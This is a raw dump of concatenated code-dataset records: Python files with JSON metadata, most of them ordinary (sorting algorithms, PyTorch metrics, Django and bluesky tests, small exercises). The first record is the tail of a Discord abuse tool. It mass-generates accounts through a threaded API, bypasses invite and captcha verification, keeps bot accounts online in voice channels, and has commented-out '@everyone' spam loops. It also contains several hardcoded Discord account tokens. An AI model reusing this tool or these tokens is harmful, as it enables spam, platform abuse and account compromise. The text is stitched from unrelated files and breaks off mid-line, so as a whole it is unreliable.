Edg/91.0.864.54\",xsu=\"eyJvcyI6IldpbmRvd3MiLCJicm93c2VyIjoiQ2hyb21lIiwiZGV2aWNlIjoiIiwic3lzdGVtX2xvY2FsZSI6ImVuLVVTIiwiYnJvd3Nlcl91c2VyX2FnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzkxLjAuNDQ3Mi4xMTQgU2FmYXJpLzUzNy4zNiBFZGcvOTEuMC44NjQuNTQiLCJicm93c2VyX3ZlcnNpb24iOiI5MS4wLjQ0NzIuMTE0Iiwib3NfdmVyc2lvbiI6IjEwIiwicmVmZXJyZXIiOiJodHRwczovL2dpdmVhd2F5Ym90LnBhcnR5LyIsInJlZmVycmluZ19kb21haW4iOiJnaXZlYXdheWJvdC5wYXJ0eSIsInJlZmVycmVyX2N1cnJlbnQiOiIiLCJyZWZlcnJpbmdfZG9tYWluX2N1cnJlbnQiOiIiLCJyZWxlYXNlX2NoYW5uZWwiOiJzdGFibGUiLCJjbGllbnRfYnVpbGRfbnVtYmVyIjo4ODI5NiwiY2xpZW50X2V2ZW50X3NvdXJjZSI6bnVsbH0=\", referrer=url)).json()\r\n print(codeurl['location'])\r\n session.get(codeurl['location'], headers=headers())\r\n htmltoken = session.get('https://ftune.app/?logged=true', headers=headers()).text\r\n soup = BeautifulSoup(htmltoken, \"html.parser\")\r\n s = str(soup.find_all('script')[0])\r\n print(htmltoken)\r\n s = s.split('\",\"')\r\n print(session.post(\"https://ftune.app/_go/\" + invite, headers=headers(s[-2])).text)\r\n\r\n '''\r\n while runn:\r\n sleep(heartbeat_interval/1000)\r\n try:\r\n ws.send(dumps({\"op\": 1,\"d\": None}))\r\n except Exception:\r\n break\r\n '''\r\n #return post(f\"http://127.0.0.1:8080/?token={token}&ch={ch_id}&guild={guild_id}\")\r\n\r\ndef online(token,name,livesteam,loop, chid=None, guild_id=None):\r\n global runn\r\n ws = WebSocket()\r\n ws.connect(\"wss://gateway.discord.gg/?v=8&encoding=json\")\r\n hello = loads(ws.recv())\r\n ws.send(dumps({\"op\": 2,\"d\": {\"token\": token,\"properties\": {\"$os\": \"windows\",\"$browser\": \"Discord\",\"$device\": \"desktop\"},\"presence\": {\"game\": {\"name\": name,\"type\": randint(0,3)},\"status\": choice(['online', 'dnd', 'idle']),\"since\": 0,\"afk\": False}}}))\r\n if livesteam:\r\n\r\n ws.send(dumps({\"op\": 4,\"d\": {\"guild_id\": guild_id,\"channel_id\": chid,\"self_mute\": True,\"self_deaf\": True}}))\r\n ws.send(dumps({\"op\": 18,\"d\": {\"type\": \"guild\",\"guild_id\": guild_id,\"channel_id\": chid,\"preferred_region\": \"singapore\"}}))\r\n if loop:\r\n heartbeat_interval = hello['d']['heartbeat_interval']\r\n while runn:\r\n sleep(heartbeat_interval/1000)\r\n try:\r\n ws.send(dumps({\"op\": 1,\"d\": None}))\r\n except Exception:\r\n break\r\n\r\ndef start(username,invite):\r\n token = token_gen(username,invite,ver_m, ver_p)\r\n if online_tf:\r\n online(token,online_msg,livesteam_tf,runn,livesteam_ch,livesteam_g)\r\n #for a in range(50):\r\n # sendmsg(\"@everyone\", \"870945232554954764\", \"870945229577019422\", token)\r\n\r\n@app.route(\"/gen\", methods=['POST'])\r\ndef api_gen():\r\n for aa in range(int(request.args['amount'])):\r\n executor.submit(start,request.args['username'],request.args['invite'])\r\n #start(request.args['username'],request.args['invite'])\r\n if aa > 500:\r\n print(\"[main] wait 5 sec\")\r\n sleep(5)\r\n sleep(0.01)\r\n print(f\"[main] Start Thread {aa}\")\r\n return \"true\"\r\n\r\n@app.route(\"/stats\", methods=['GET'])\r\ndef api_stats():\r\n try :\r\n return f\"{str(token_am)}|{str(get_bal())}\"\r\n except :\r\n return f\"ERROR|ERROR\",500\r\n\r\n@app.route(\"/update\", methods=['POST'])\r\ndef api_update():\r\n global ver_m,ver_p,online_tf,online_msg,livesteam_tf,livesteam_ch,livesteam_g,runn\r\n method = request.args['method']\r\n tf = request.args['tf']\r\n if method == \"l\":\r\n if tf == \"1\":\r\n livesteam_tf = True\r\n else :\r\n livesteam_tf = False\r\n aaa = request.args['msg'].split(\"|\")\r\n livesteam_ch = aaa[1]\r\n livesteam_g = aaa[0]\r\n elif method == \"o\":\r\n if tf == \"1\":\r\n online_tf = True\r\n else :\r\n online_tf = False\r\n online_msg = request.args['msg']\r\n return \"true\"\r\n\r\n@app.route(\"/\", methods=['GET'])\r\ndef index():\r\n return f\"{ver_m} {ver_p} {online_tf} {online_msg} {livesteam_tf} {livesteam_ch} {livesteam_g} {runn}\"\r\n\r\nif __name__ == \"__main__\":\r\n app.run(host='127.0.0.1',port=80)\r\n #asdasd = [\"ODc1MDIzMzE4MzEzNDkyNTIw.YRPfHA.pg4KFQ6IVrsWIIOJ5E6z4qqUl4I\",\"ODc1MDI2MjU4MzQ0NDExMTY2.YRPh2g.x2duBXL32Eb3Yt2bFeu8bHfKZJY\",\"ODc1MDI2NjU2NzU3MTY2MTkx.YRPiHw.QxNv6stl6iENxpk8xcRonrjBP9Y\"]\r\n #for aaaaa in range(10):\r\n # executor.submit(sendmsg,f\"@everyone {asciigen(1988)}\",\"875031605272522792\",\"870945229577019422\", \"ODc1MDIzMzE4MzEzNDkyNTIw.YRPfHA.pg4KFQ6IVrsWIIOJ5E6z4qqUl4I\")\r\n #sendmsg(\"@everyone\", \"870945232554954764\", \"870945229577019422\", asdasd)\r\n '''\r\n if empty():\r\n exit('capmonster balance empty')\r\n for aa in range(int(config['tokenc'])):\r\n aa +=1\r\n print(f'[main] start gen {aa}')\r\n #start()\r\n Thread(target=start).start()\r\n sleep(0.1)\r\n '''\r\n\r\n# token_gen() \r\n# bypass_fortune_invite(\"ODY2NDQ2MzY1MjIzNTUwOTc2.YPSrUQ.RR6ZMXO3LNwxdRTJ9DKu6vnd-YA\",\"aa\") #free\r\n# bypass_fortune_invite(\"\",\"\") #free\r\n\r\n# bypass_server_cap(\"\", \"\", \"\") #paid\r\n# bypass_aria(\"\", [\"a\",\"a\",\"a\"], \"\", \"\") #free\r\n# bypass_aria_verify(\"\",\"854917182172299274\", \"850027624918810624\") #free\r\n\r\n# livesteam(\"\", \"\", \"\") #freeonline(\"ODc1MDIzMzE4MzEzNDkyNTIw.YRPfHA.pg4KFQ6IVrsWIIOJ5E6z4qqUl4I\",\"a\",False,False)","sub_path":"czloed_Dhub_v2.py","file_name":"czloed_Dhub_v2.py","file_ext":"py","file_size_in_byte":19384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"133066947","text":"import numpy as np \n\ndef tlbr_occlution(tlbr1, tlbr2):\n \"\"\"(min x, min y, max x, max y)`, i.e.,\n `(top left, bottom right)`.\n\n -> calculate their overlap\n \"\"\"\n in_w=max(.0, min(tlbr2[2], tlbr1[2]) - max(tlbr1[0], tlbr2[0]))\n in_h=max(.0, min(tlbr2[3],tlbr2[3]) - max(tlbr1[1], tlbr2[1]))\n inter= in_w * in_h\n S_1= (tlbr1[3]-tlbr1[1])*(tlbr1[2]-tlbr1[0])\n S_2=(tlbr2[3]- tlbr2[1])*(tlbr2[2]-tlbr2[0])\n return (inter/S_1, inter/S_2)\n\n\nif __name__=='__main__':\n tlbr1=[0, 0, 7, 5]\n tlbr2=[3, 3, 9, 7]\n print(tlbr_occlution(tlbr1, tlbr2))\n #(0.45714285714285713, 0.6666666666666666)","sub_path":"src/lib/tracking_utils/calculation.py","file_name":"calculation.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"430625371","text":"#https://www.codewars.com/kata/simple-physics-problem/train/python\r\n\r\ndef solveit(vi, vf, t):\r\n a = (vf-vi)/t\r\n d = vi*t + 0.5*a*(t**2)\r\n a = round(a,2)\r\n d = round(d,2)\r\n \r\n if vi > vf:\r\n return []\r\n else:\r\n return [a,d]\r\n","sub_path":"SimplePhysics.py","file_name":"SimplePhysics.py","file_ext":"py","file_size_in_byte":258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"455817985","text":"class Query(object):\r\n statements = None\r\n order = None\r\n binds = None\r\n query = None\r\n select = None\r\n table = None\r\n \r\n def __init__(self,Model):\r\n from Lib.DAO.Dao import Dao\r\n self.statements = []\r\n self.binds = []\r\n self.order = []\r\n self.query = ''\r\n self.table = Dao.getTable(Model)\r\n \r\n def add(self,Statement):\r\n if Statement.__class__.__name__ == 'Order':\r\n self.order.append(Statement)\r\n else:\r\n self.statements.append(Statement)\r\n \r\n def prepare(self):\r\n if self.statements:\r\n for pos, S in enumerate(self.statements):\r\n S.prepare(self, pos)\r\n if self.order:\r\n for pos, O in enumerate(self.order):\r\n O.prepare(self,pos)\r\n self.select = \"SELECT * FROM {}\".format(self.table) \r\n ","sub_path":"obligatorio/boleteria/Lib/DAO/Strategy/Query.py","file_name":"Query.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"304031795","text":"import random\nfrom algolib.share.commons import less, exch\n\nclass Shuffle(object):\n \n '''\n Implements knuth shuffleing\n '''\n \n @classmethod\n def shuffle(cls, a):\n N = len(a)\n for i in xrange(N):\n r = random.randint(0, i)\n exch(a, i, r)\n\nclass Selection(object):\n \n @classmethod\n def sort(cls, a):\n N = len(a)\n for i in xrange(N):\n min = i\n for j in xrange(i + 1, N):\n if less(a[j], a[min]):\n min = j\n exch(a, i, min) \n\nclass Insertion(object):\n \n @classmethod\n def sort(cls, a):\n N = len(a)\n for i in xrange(0, N):\n for j in xrange(i, 0, -1): # i - 1 down to 0\n if less(a[j - 1], a[j]):\n break\n else:\n exch(a, j - 1, j)\n\n'''\n TODO : fix mergesort not to return a\n'''\nclass Mergesort(object):\n \n '''\n Mergesort using array slicing instead of separate index passing\n '''\n \n @classmethod\n def sort(cls, a):\n if len(a) == 1:\n return a\n else:\n mid = len(a) // 2 # integer division\n left = Mergesort.sort(a[ : mid])\n right = Mergesort.sort(a[mid : ])\n return Mergesort.__merge(left, right)\n \n @classmethod\n def __merge(cls, left, right):\n \n L = len(left)\n R = len(right)\n a = [None] * (L + R) # one way to create fixed sized (pre-allocate) array in python\n \n l = r = k = 0\n while((l < L) and (r < R)):\n if left[l] < right[r]:\n a[k] = left[l]\n l += 1\n elif left[l] > right[r]:\n a[k] = right[r]\n r += 1\n else:\n a[k] = left[l]\n k += 1\n l += 1\n a[k] = right[r]\n r += 1\n k += 1\n\n while(l < L):\n a[k] = left[l]\n l += 1\n k += 1\n \n while(r < R):\n a[k] = right[r]\n r += 1\n k += 1\n \n return a\n \nclass MergesortFix(object):\n \n @classmethod\n def sort(cls, a):\n aux = a[:]\n Mergesort.__sort(a, aux, 0, len(a) - 1)\n \n @classmethod\n def __sort(cls, a, aux, low, high):\n if high > low: \n mid = (high - low) // 2 + low\n Mergesort.__sort(a, aux, low, mid)\n Mergesort.__sort(a, aux, mid + 1, high)\n Mergesort.__merge(a, aux, low, mid, high)\n \n @classmethod\n def __merge(cls, a, aux, low, mid, high): \n i = low\n j = mid + 1\n for k in xrange(low, high + 1):\n if i > mid:\n a[k] = aux[j]\n j += 1\n elif j > high:\n a[k] = aux[i]\n i += 1\n elif Mergesort.__less(aux[j], aux[i]):\n a[k] = aux[j]\n j += 1\n else:\n a[k] = aux[i]\n i += 1\n \n @classmethod\n def __less(cls, v, w):\n return v < w\n\n","sub_path":"sorting/sort.py","file_name":"sort.py","file_ext":"py","file_size_in_byte":3162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"47889540","text":"from bluesky.magics import BlueskyMagics\nimport bluesky.plans as bp\nfrom bluesky.examples import det, motor1, motor2, det1, det2, Mover\nfrom collections import OrderedDict\nimport os\nimport pytest\nimport signal\nfrom types import SimpleNamespace\n\n\nclass FakeIPython:\n def __init__(self, user_ns):\n self.user_ns = user_ns\n\n\ndef compare_msgs(actual, expected):\n for a, e in zip(actual, expected):\n # Strip off randomized stuff that cannot be compared.\n a.kwargs.pop('group', None)\n e.kwargs.pop('group', None)\n assert a == e\n\ndets = [det]\ndefault_dets = [det1, det2]\n\n@pytest.mark.parametrize('pln,magic,line', [\n (bp.mv(motor1, 2), 'mov', 'motor1 2'),\n (bp.mv(motor1, 2, motor2, 3), 'mov', 'motor1 2 motor2 3'),\n (bp.mvr(motor1, 2), 'movr', 'motor1 2'),\n (bp.mvr(motor1, 2, motor2, 3), 'movr', 'motor1 2 motor2 3'),\n (bp.count(dets), 'ct', 'dets'),\n (bp.count(default_dets), 'ct', ''),\n ])\ndef test_bluesky_magics(pln, line, magic, fresh_RE):\n RE = fresh_RE\n\n # Build a FakeIPython instance to use the magics with.\n\n dets = [det]\n ip = FakeIPython({'motor1': motor1, 'motor2': motor2, 'dets': dets})\n sm = BlueskyMagics(ip)\n sm.detectors = default_dets\n\n # Spy on all msgs processed by RE.\n msgs = []\n\n def collect(msg):\n msgs.append(msg)\n\n RE.msg_hook = collect\n sm.RE.msg_hook = collect\n\n # Test magics cause the RunEngine to execute the messages we expect.\n RE(bp.mv(motor1, 10, motor2, 10)) # ensure known initial state\n RE(pln)\n expected = msgs.copy()\n msgs.clear()\n RE(bp.mv(motor1, 10, motor2, 10)) # ensure known initial state\n getattr(sm, magic)(line)\n actual = msgs.copy()\n msgs.clear()\n compare_msgs(actual, expected)\n\n\n# The %wa magic doesn't use a RunEngine or a plan.\ndef test_wa():\n motor = Mover('motor', OrderedDict([('motor', lambda x: x),\n ('motor_setpoint', lambda x: x)]),\n {'x': 0})\n ip = FakeIPython({'motor': motor})\n sm = BlueskyMagics(ip)\n # Test an empty list.\n sm.wa('')\n\n sm.positioners.extend([motor])\n sm.wa('')\n\n # Make motor support more attributes.\n motor.limits = (-1, 1)\n sm.wa('')\n motor.user_offset = SimpleNamespace(get=lambda: 0)\n\n sm.wa('[motor]')\n\n\ndef test_magics_missing_ns_key(fresh_RE):\n RE = fresh_RE\n ip = FakeIPython({})\n sm = BlueskyMagics(ip)\n with pytest.raises(NameError):\n sm.mov('motor1 5')\n ip.user_ns['motor1'] = motor1\n sm.mov('motor1 5')\n\n\ndef test_interrupted(motor_det):\n motor, det = motor_det\n motor._fake_sleep = 10\n\n ip = FakeIPython({})\n sm = BlueskyMagics(ip)\n ip.user_ns['motor'] = motor\n\n pid = os.getpid()\n\n def sim_kill(n=1):\n for j in range(n):\n print('KILL')\n os.kill(pid, signal.SIGINT)\n\n motor.loop = sm.RE.loop\n sm.RE.loop.call_later(1, sim_kill, 2)\n sm.mov('motor 1')\n assert sm.RE.state == 'idle'\n","sub_path":"bluesky/tests/test_magics.py","file_name":"test_magics.py","file_ext":"py","file_size_in_byte":2985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"492748837","text":"# get size of tree\r\nsize = int( input(\"Enter size of the pyramid: \"))\r\n\r\n# make stem - tanai darakht\r\nstem = \" \" * (size - 1) + \"***\" \r\n\r\n# built tree\r\nfor i in range(size):\r\n\tif i % 4 == 3:\r\n\t\tprint (stem)\r\n\telse:\r\n\t\tprint (\" \" * (size - i) + \"*\" * (i + i + 1))\r\n\r\n# bottom of stem\r\nfor i in range(2):\r\n\tprint (stem)","sub_path":"star patterns/10.py","file_name":"10.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"238661733","text":"from datetime import datetime\nfrom car_location.location.models.categoriaveiculo import CategoriaVeiculo\nfrom car_location.location.models.cliente import Cliente\nfrom car_location.location.models.devolucao import Devolucao\nfrom car_location.location.models.locacao import Locacao\nfrom car_location.location.models.veiculo import Veiculo\nfrom rest_framework import status\n\n__author__ = 'lucas'\nfrom django.shortcuts import resolve_url as r\nfrom rest_framework.test import APITestCase\n\n\nclass DevolucaoApiTests(APITestCase):\n def setUp(self):\n self.categoria = CategoriaVeiculo.objects.create(nome='Carro', tipo_cnh='B,C')\n self.veiculo = Veiculo.objects.create(modelo='Palio',\n categoria=self.categoria,\n quilometragem=55,\n disponivel=False)\n\n self.cliente = Cliente.objects.create(nome='lucas', cpf='12345678901',\n tipo_cnh='B', email='lucas@test.com',\n phone='719991625771')\n\n self.locacao = Locacao.objects.create(cliente=self.cliente,\n veiculo=self.veiculo,\n data_inicial='2015-01-23', data_final='2015-01-27',\n km_inicial=self.veiculo.quilometragem, valor=10)\n\n self.data = dict(locacao=self.locacao.pk, km_percorrido=10)\n\n def test_new_Devolucao(self):\n \"\"\"\n cadastrando devolução\n \"\"\"\n\n url = r('location:devolucao-list')\n response = self.client.post(url, self.data, format='json')\n with self.subTest():\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n self.assertEqual(Devolucao.objects.count(), 1)\n self.assertEqual(Locacao.objects.get().devolvido, True)\n self.assertIsInstance(Devolucao.objects.get().data_entrega, datetime)\n self.assertEqual(Veiculo.objects.get().disponivel, True)\n\n def test_detail_devolucao(self):\n '''\n detalhe da devolucao\n '''\n\n self.obj = Devolucao.objects.create(locacao=self.locacao, km_percorrido=10)\n\n url = r('location:devolucao-detail', self.obj.pk)\n\n response = self.client.get(url, format='json')\n\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n\n def test_delete_devolucao(self):\n \"\"\"\n removendo devolução\n\n \"\"\"\n self.obj = Devolucao.objects.create(locacao=self.locacao, km_percorrido=10)\n\n url = r('location:devolucao-detail', self.obj.pk)\n\n response = self.client.delete(url[1:])\n\n self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)\n\n","sub_path":"car_location/location/tests/test_api_devolucao.py","file_name":"test_api_devolucao.py","file_ext":"py","file_size_in_byte":2753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"624516744","text":"from django.conf.urls import url, include\nfrom django.views.generic import FormView, TemplateView\n\nfrom polls import forms\nfrom polls import views\nfrom polls.rest import router\n\nurlpatterns = [\n url(r'^$', views.PollListView.as_view(), name='poll_home'),\n url(r'^rest/', include(router.urls), name='rest'),\n url(r'^about/', views.AboutView.as_view(vistor=\"Changbin\"), name='about'),\n url(r'^bootstrap3/', FormView.as_view(template_name='polls/bootstrap3.html', form_class=forms.MyRegistrationForm),\n name='bootstrap3'),\n url(r'^(?P\\d+)/$', views.DetailView.as_view(), name='detail'),\n url(r'^(?P\\d+)/results/$', views.ResultsView.as_view(), name='results'),\n url(r'^(?P\\d+)/vote/$', views.vote, name='vote'),\n url(r'^jinja2/$', TemplateView.as_view(template_name=\"polls/jinja.jinja2\"), {'words': 'Hello, Jinja2.'},\n name='jinja2', ),\n]\n","sub_path":"polls/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"149006994","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nimport math\nimport os\nimport sys\nfrom functools import partial\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\n\nfrom trident.backend.common import get_session, addindent, get_time_suffix, get_class, get_function, camel2snake\nfrom trident.backend.pytorch_ops import *\nfrom trident.data.mask_common import mask2trimap\n\n__all__ = ['accuracy','recall','pixel_accuracy','alpha_pixel_accuracy','iou','psnr','mean_absolute_error','mean_squared_error','mean_squared_logarithmic_error','mae','mse','rmse','msle','get_metric']\n\n# def accuracy(input, target,axis=1):\n# input_tensor=input.clone().detach()\n# target_tensor=target.clone().detach()\n# if input_tensor.dtype!=torch.int64:\n# input_tensor=argmax(input_tensor,axis).squeeze()\n# if target_tensor.dtype!=torch.int64:\n# target_tensor=argmax(target_tensor,axis).squeeze()\n# if input_tensor.shape!=target_tensor.shape:\n# raise ValueError('input shape {0} is not competable with target shape {1}'.format(input_tensor.shape,target_tensor.shape))\n# else:\n# return input_tensor.eq(target_tensor).float().mean()\n\n\n\n\n\n\n@torch.no_grad()\ndef accuracy(output, target, topk=1,axis=1,ignore_index=-100, exclude_mask=False):\n \"\"\"Computes the precision@k for the specified values of k\n prec1, prec5 = accuracy(output.data, target, topk=(1, 5))\n \"\"\"\n input_tensor=output.copy().detach()\n target_tensor=target.copy().detach()\n num_classes = int_shape(output)[axis]\n if len(input_tensor)==0:\n return to_tensor(0.0)\n\n\n is_logsoftmax = None\n from_logits = None\n output_exp = exp(input_tensor)\n if (ndim(input_tensor) >= 1 and 'float' in str(input_tensor.dtype) and input_tensor.min() >= 0 and input_tensor.max() <= 1):\n is_logsoftmax = False\n from_logits = True\n input_tensor = clip(input_tensor, min=1e-8, max=1 - 1e-8)\n\n elif (ndim(output_exp) >= 1 and 'float' in str(output_exp.dtype) and output_exp.min() >= 0 and output_exp.max() <= 1):\n is_logsoftmax = True\n from_logits = True\n input_tensor = clip(output_exp, min=1e-8, max=1 - 1e-8)\n else:\n is_logsoftmax = False\n from_logits = False\n\n if input_tensor.dtype!=torch.int64 and topk==1:\n if len(input_tensor.size())==1: #binary\n input_tensor=input_tensor.gt(0.5).float()\n else:\n input_tensor=argmax(input_tensor,axis).squeeze()\n if target_tensor.dtype!=torch.int64:\n target_tensor=argmax(target_tensor,axis).squeeze()\n if input_tensor.shape!=target_tensor.shape and topk==1:\n raise ValueError('input shape {0} is not competable with target shape {1}'.format(input_tensor.shape,target_tensor.shape))\n\n input_mask=ones_like(input_tensor)\n if isinstance(ignore_index, int) and 0 <= ignore_index < num_classes:\n input_mask[input_tensor==ignore_index] = 0\n elif isinstance(ignore_index, (list, tuple)):\n for idx in ignore_index:\n if isinstance(idx, int) and 0 <= idx < int_shape(output)[axis]:\n input_mask[input_tensor == idx] = 0\n\n batch_size = target_tensor.size(0)\n if topk==1:\n return (input_tensor.eq(target_tensor).float()*input_mask).sum()/clip((input_mask).float().sum(),min=1)\n else:\n _, pred = input_tensor.topk(topk)\n pred = pred.t()\n correct = pred.eq(target_tensor.reshape((1, -1)).expand_as(pred))\n correct_k = reduce_sum(correct[:topk].reshape(-1).float(),axis=0,keepdims=True)\n return correct_k.mul_(1 / batch_size)\n\n\n\n@torch.no_grad()\ndef recall(output, target, axis=1,ignore_index=-100):\n \"\"\"Computes the precision@k for the specified values of k\n prec1, prec5 = accuracy(output.data, target, topk=(1, 5))\n \"\"\"\n input_tensor=output.copy().detach()\n target_tensor=target.copy().detach()\n num_classes = int_shape(output)[axis]\n\n\n is_logsoftmax = None\n from_logits = None\n output_exp = exp(input_tensor)\n if (ndim(input_tensor) >= 1 and 'float' in str(input_tensor.dtype) and input_tensor.min() >= 0 and input_tensor.max() <= 1):\n is_logsoftmax = False\n from_logits = True\n input_tensor = clip(input_tensor, min=1e-8, max=1 - 1e-8)\n\n elif (ndim(output_exp) >= 1 and 'float' in str(output_exp.dtype) and output_exp.min() >= 0 and output_exp.max() <= 1):\n is_logsoftmax = True\n from_logits = True\n input_tensor = clip(output_exp, min=1e-8, max=1 - 1e-8)\n else:\n is_logsoftmax = False\n from_logits = False\n\n if input_tensor.dtype!=torch.int64 :\n if len(input_tensor.size())==1: #binary\n input_tensor=input_tensor.gt(0.5).float()\n else:\n input_tensor=argmax(input_tensor,axis).squeeze()\n if target_tensor.dtype!=torch.int64:\n target_tensor=argmax(target_tensor,axis).squeeze()\n if input_tensor.shape!=target_tensor.shape :\n raise ValueError('input shape {0} is not competable with target shape {1}'.format(input_tensor.shape,target_tensor.shape))\n target_mask=ones_like(target_tensor)\n if isinstance(ignore_index, int) and 0 <= ignore_index < num_classes:\n target_mask[target_tensor==ignore_index] = 0\n elif isinstance(ignore_index, (list, tuple)):\n for idx in ignore_index:\n if isinstance(idx, int) and 0 <= idx < int_shape(output)[axis]:\n target_mask[target_tensor == idx] = 0\n\n batch_size = target_tensor.size(0)\n return (input_tensor.eq(target_tensor).float()*target_mask).sum()/clip((target_mask).float().sum(),min=1)\n\n\n\n\n@torch.no_grad()\ndef psnr(output, target):\n input_tensor = output.clone().detach()\n target_tensor = target.clone().detach()\n if input_tensor.shape != target_tensor.shape :\n raise ValueError(\n 'input shape {0} is not competable with target shape {1}'.format(input_tensor.shape, target_tensor.shape))\n\n max_value = 255\n target_np = to_numpy(target_tensor)\n if target_np.min() <0 :\n target_tensor = (target_tensor + 1) * 0.5\n input_tensor = (input_tensor + 1) * 0.5\n max_value = 1\n elif 0 <= target_np.min() <= 1 and 0 <= target_np.max() <= 1:\n max_value = 1\n rmse = ((input_tensor - target_tensor) ** 2).mean().sqrt()\n psnr = 20 * ((max_value/ rmse).log10_())\n return psnr\n\n@torch.no_grad()\ndef mean_absolute_error(output, target):\n input_tensor = output.view(-1).clone().detach()\n target_tensor = target.view(-1).clone().detach()\n\n if input_tensor.shape != target_tensor.shape:\n raise ValueError(\n 'input shape {0} is not competable with target shape {1}'.format(input_tensor.shape, target_tensor.shape))\n return torch.abs(input_tensor- target_tensor).mean()\nmae=mean_absolute_error\n\n@torch.no_grad()\ndef mean_squared_error(output, target):\n input_tensor = output.view(-1).clone().detach()\n target_tensor = target.view(-1).clone().detach()\n\n if input_tensor.shape != target_tensor.shape:\n raise ValueError(\n 'input shape {0} is not competable with target shape {1}'.format(input_tensor.shape, target_tensor.shape))\n return F.mse_loss(input_tensor, target_tensor)\nmse=mean_squared_error\n\n\n\n@torch.no_grad()\ndef root_mean_squared_error(output, target):\n input_tensor=output.view(-1).clone().detach()\n target_tensor=target.view(-1).clone().detach()\n\n if input_tensor.shape!=target_tensor.shape :\n raise ValueError('input shape {0} is not competable with target shape {1}'.format(input_tensor.shape,target_tensor.shape))\n return torch.sqrt(F.mse_loss(input_tensor, target_tensor,reduction='mean'))\nrmse=root_mean_squared_error\n\n\n@torch.no_grad()\ndef mean_squared_logarithmic_error(output, target):\n input_tensor=output.view(-1).clone().detach()\n target_tensor=target.view(-1).clone().detach()\n\n if input_tensor.shape!=target_tensor.shape :\n raise ValueError('input shape {0} is not competable with target shape {1}'.format(input_tensor.shape,target_tensor.shape))\n return F.mse_loss(torch.log(1 + input_tensor), torch.log(1 + target_tensor))\nmsle=mean_squared_logarithmic_error\n\n\n@torch.no_grad()\ndef pixel_accuracy(output, target):\n input_tensor = output.clone().detach()\n target_tensor = target.clone().detach()\n if input_tensor.dtype!=torch.int64 :\n input_tensor=argmax(input_tensor,axis=1).squeeze()\n pixel_labeled = (target_tensor > 0).sum().float()\n pixel_correct = ((input_tensor == target_tensor)*(target_tensor > 0)).sum().float()\n return pixel_correct/max(pixel_labeled,1)\n\n@torch.no_grad()\ndef alpha_pixel_accuracy(output, alpha):\n output_tensor = to_numpy(output)\n alpha_tensor = to_numpy(alpha)\n\n trimap=alpha_tensor.copy()\n trimap[(00.95]=1\n pixel_labeled = (output_tensor > 0).sum()\n pixel_correct = ((output_tensor == alpha_tensor)*(trimap == 1)).sum()+ (np.less(np.abs(output_tensor - alpha_tensor),0.1).astype(np.float32)*(trimap == 0.5)).sum()\n return pixel_correct/max(pixel_labeled,1)\n\n@torch.no_grad()\ndef iou(output, target):\n input_tensor = output.clone().detach()\n target_tensor = target.clone().detach()\n if input_tensor.dtype != torch.int64:\n input_tensor = argmax(input_tensor, axis=1).squeeze()\n\n intersection =( (input_tensor > 0) * (input_tensor == target_tensor)).sum().float()\n union=((input_tensor+target_tensor)>0).sum().float()\n\n return intersection/max(union,1)\n\n\ndef get_metric(metric_name):\n if metric_name is None:\n return None\n\n metric_modules = ['trident.optims.pytorch_metrics']\n if metric_name in __all__:\n metric_fn = get_function(metric_name, metric_modules)\n else:\n try:\n metric_fn = get_function(camel2snake(metric_name), metric_modules)\n except Exception :\n metric_fn = get_function(metric_name, metric_modules)\n return metric_fn\n\n\n\n","sub_path":"trident/optims/pytorch_metrics.py","file_name":"pytorch_metrics.py","file_ext":"py","file_size_in_byte":10530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"198759174","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# builtin\nimport os\n\n# external\nimport numpy as np\nfrom numpy import testing\nimport pandas\nfrom nose.tools import assert_raises\n\n# local\nfrom ..gait import find_constant_speed, interpolate, WalkingData\nfrom dtk.process import time_vector\n\n# debugging\ntry:\n from IPython.core.debugger import Tracer\nexcept ImportError:\n pass\nelse:\n set_trace = Tracer()\n\n\ndef test_find_constant_speed():\n\n speed_array = np.loadtxt(os.path.join(os.path.dirname(__file__),\n 'data/treadmill-speed.csv'),\n delimiter=',')\n time = speed_array[:, 0]\n speed = speed_array[:, 1]\n\n indice, constant_speed_time = find_constant_speed(time, speed, plot=False)\n\n assert 6.5 < constant_speed_time < 7.5\n\n\ndef test_interpolate():\n\n df = pandas.DataFrame({'a': [np.nan, 3.0, 5.0, 7.0],\n 'b': [5.0, np.nan, 9.0, 11.0],\n 'c': [2.0, 4.0, 6.0, 8.0],\n 'd': [0.5, 1.0, 1.5, np.nan]},\n index=[0.0, 2.0, 4.0, 6.0])\n\n time = [0.0, 1.0, 3.0, 5.0]\n\n interpolated = interpolate(df, time)\n\n # NOTE : pandas.Series.interpolate does not extrapolate (because\n # np.interp doesn't.\n\n df_expected = pandas.DataFrame({'a': [4.0, 4.0, 4.0, 6.0],\n 'b': [5.0, 6.0, 8.0, 10.0],\n 'c': [2.0, 3.0, 5.0, 7.0],\n 'd': [0.5, 0.75, 1.25, 1.5]},\n index=time)\n\n testing.assert_allclose(interpolated.values, 